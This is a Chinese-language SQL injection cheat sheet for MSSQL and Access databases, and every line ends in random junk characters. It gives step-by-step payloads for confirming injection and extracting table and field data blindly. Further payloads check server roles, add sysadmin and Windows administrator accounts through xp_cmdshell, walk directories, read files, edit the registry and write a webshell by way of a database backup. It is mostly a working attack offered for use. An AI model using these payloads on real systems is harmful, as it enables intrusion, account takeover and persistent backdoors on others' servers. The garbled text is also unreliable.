1.判断是否有注入;and 1=1 ;and 1=2 %`1CE\f
2.初步判断是否是mssql ;and user>0 EvQwGt1)P
#x@lZ! Y
3.注入参数是字符'and [查询条件] and ''=' etMh=/NFV
2qMsa>~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ZWRRh^
bH&)rn
5.判断数据库系统 bTQa'y`3
g+ 1=5g
;and (select count(*) from sysobjects)>0 mssql /:{_| P\
~uR6z//%
;and (select count(*) from msysobjects)>0 access n,a5LR
Evq Ai/(g
)QCM2
&_/%2qs
6.猜数据库 ;and (select Count(*) from [数据库名])>0 "=\_++
6mpg&'>
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 oXlxPN39
_c
]3nzIr
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 66@3$P%1p
s7nX\:Bw:
9.(1)猜字段的ascii值(access) 9me}&Fdr
1~5q:X
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 H4'DL'83
''OInfd?
(2)猜字段的ascii值(mssql) wYO"znd
b}Hl$V(uD
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 1m<?Q&|m$
yC 7Vb
P
10.测试权限结构(mssql) QK!:q{
lAn+gDP
Q|=
Q]$d
DxKfWb5 R
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =PFR{=F
nOal7BNN
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- xJ2O4ob
,)rZAI
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ezr\T
5u|=;Hz*)
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- u@Cf*VPK
2@R8P~^W
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- fQW_YQsb
IFrb}yH
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- GtM(
Y
7}'A)C>J;
;and 1=(select IS_MEMBER('db_owner'));-- o d}EM_
vf'cx:m
OVUs]uK
Xm8Z+}i
11.添加mssql和系统的帐户 I51oG:6fR?
@bW[J
;exec master.dbo.sp_addlogin username;-- v-;XyVx
;exec master.dbo.sp_password null,username,password;-- \%Ah^U)gS
=qp}p'BYe
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- lQdnL.w$.4
6/mkJj+"
;exec master.dbo.xp_cmdshell 'net user username password |ON&._`LH
-4?xwz9o$7
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- G=C5T(
^0Q=#p
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Q\27\2
C^/ -lc
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- lbB.*oQ
Rct"\{V')n
T1(j l)
&8]#RQy{f
12.(1)遍历目录 UEEBWz H
7bonOt
Y
;create table dirs(paths varchar(100), id int) ~[zFQ)([
"B9[cDM&
;insert dirs exec master.dbo.xp_dirtree 'c:\' &N"'7bK6n
jB%"AvIX
;and (select top 1 paths from dirs)>0 $AA~]'O>6:
my\o P(e\
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) :T7?
H~[LJ5x
-}Cc"qm
3tT|9Tb@
(2)遍历目录 1KTabj/C
aFRTNu/r
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 9Qzjqq:"Li
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 y Y>-MoF/t
1
[Sv
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 YVB%
kKv{
(px*R~}
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Sc&)~h}YF
1z~k1usRK
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 /7k.r}6\R
zBk_-'z
.vv5t
FOCoiocPi
13.mssql中的存储过程 p!+L
"_K}rI6(t
xp_regenumvalues 注册表根键, 子键 m<FF$pTT
${hyNt
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 R9tckRG#
|H ^w>mk
xp_regread 根键,子键,键值名 !}>eo2$r^
F2IC$:e
M
;exec xp_regread 8yE!7$Mj
l60ikc4$I
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g!1I21M1~
\f(Y:}9
xp_regwrite 根键,子键, 值名, 值类型, 值 G*i.a*9<)
?SC3Vzr
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 uu}a:qrY
1P_Fe[8
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 5ZnSA9?
Y 3o^Euou
xp_regdeletevalue 根键,子键,值名 +w "XNl
=m`l%V[
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 EfKM*;A
<fNGhmL
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 89zuL18V
OuB2 x=B
h ZoC _\
g-."sniP$g
14.mssql的backup创建webshell p1Q/g Il
MWM
+hk1fs
use model |]^l^e6m
R=`U 4Ml;
create table cmd(str image); [ZuVUOm
AK6=Ydu
insert into cmd(str) values (''); Q> kiVvc
saatU;V
backup database model to disk='c:\l.asp'; K<c2PFo)Q
y:Z$LmPc<
z{%oJ_
y k?SD1hj
15.mssql内置函数 j7f5|^/x3
Ll,I-BQ9
;and (select @@version)>0 获得Windows的版本号 mHKJ
t-_#Q bzE{
;and user_name()='dbo' 判断当前系统的连接用户是不是sa f,|QAj=a
>f>V5L%1
;and (select user_name())>0 爆当前系统的连接用户 StEQ
-k
!?jK1{E3
;and (select db_name())>0 得到当前连接的数据库 +<&E3O r
nt7|f,_J
;:P7}v fz!
>GgE,h
16.简洁的webshell bn $)f6%
,ohmc\*J
use model 9+}cE**=d
ri: ,q/-
create table cmd(str image); '}_=kp'X
)&>L !,z
insert into cmd(str) values (''); q$F) !&
L/ ~D<V
backup database model to disk='g:\wwwtest\l.asp';